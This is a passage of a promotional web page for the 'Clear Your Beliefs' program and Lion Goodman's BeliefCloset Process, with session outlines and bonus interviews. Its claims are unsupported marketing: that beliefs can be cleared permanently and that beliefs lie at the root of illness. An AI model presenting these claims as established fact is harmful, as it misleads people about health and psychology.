able to achieve permanent success.</p>\n<p>&nbsp;</p>\n<h1>Upgrade Your Human Operating System</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong></p>\n\n<strong><em>I''m not enough.</em></strong>\n<strong><em>I can''t do it.</em></strong>\n<strong><em>I''m not worthy.</em></strong>\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\n<strong><em>I''m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There''s something wrong with me.</em></strong>\n<strong><em>I''m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.</p>\n<p><strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<p>&nbsp;</p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p>The same thing is true in your subconscious mind:</p>\n<p><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></p>\n<p><strong>It''s that simple.</strong></p>\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\n<p>When you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It''s that simple.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Beliefs Are Difficult To Change</h1>\n\n<p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n<p>&nbsp;</p>\n<h1>Why We React The Way We Do</h1>\n\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\n</p>\nWhy did I say that?\nWhat''s wrong with me?\nWhy didn''t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<p><em></p>\n\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p>\n\n<p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p>\n\n<p>&nbsp;</p>\n<h1>Here''s Some Good News</h1>\n\n<strong><strong><strong>First: It''s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n\n<p><strong>Can you imagine this?</strong></p>\n<p><img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" /></p>\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n<p>&nbsp;</p>\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n<p>&nbsp;</p>\n<h1>Clear Whatever Is In The Way</h1>\n\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Is This A Guaranteed Cure-All?</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n<p>&nbsp;</p>\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n<p>&nbsp;</p>\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\n\n<p>&nbsp;</p>\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n<p>In gratitude, and with warm wishes for your total success,</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a></p>\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n<p>&nbsp;</p>\n<h1>Register Today and Discover What''s Possible</h1>\n\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\n\n<p>&nbsp;</p>\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n<p><strong> In Session 1, you will:</strong></p>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n<p><strong> In Session 2, you will:</strong></p>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.</p>\n<p>This isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.</p>\n<p><em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...</p>\n\n<p>Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.</p>\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!\n\n<p><strong> In Session 3, you will:</strong></p>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.</p>\n<p>If you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?</p>\n<p>Humans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.</p>\n\n<p>&nbsp;</p>\n\n<p><strong> In Session 4, you will:</strong></p>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!</p>\n<p>What do you believe about earning a living in today''s economy?   Is money really the root of all evil?</p>\n<p>If you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?</p>\n\n<p><strong> In Session 5, you will:</strong></p>\n\nExamine your family and cultural beliefs about money, work, poverty and "deservingness."\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.</p>\n<p>Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?</p>\n\n<p><strong> In Session 6, you will:</strong></p>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.</p>\n<p>You''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.</p>\n<p>When you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.</p>\n\n<p><strong> In Session 7, you will:</strong></p>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n<p></p>\n<p>&nbsp;</p>\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\n<p>In addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.</p>\n<p>&nbsp;</p>\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?</p>\n<p>Lion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)</p>\n<p>Carista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.</p>\n<p>Learn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<p><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.</p>\n\n<p>Lion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the 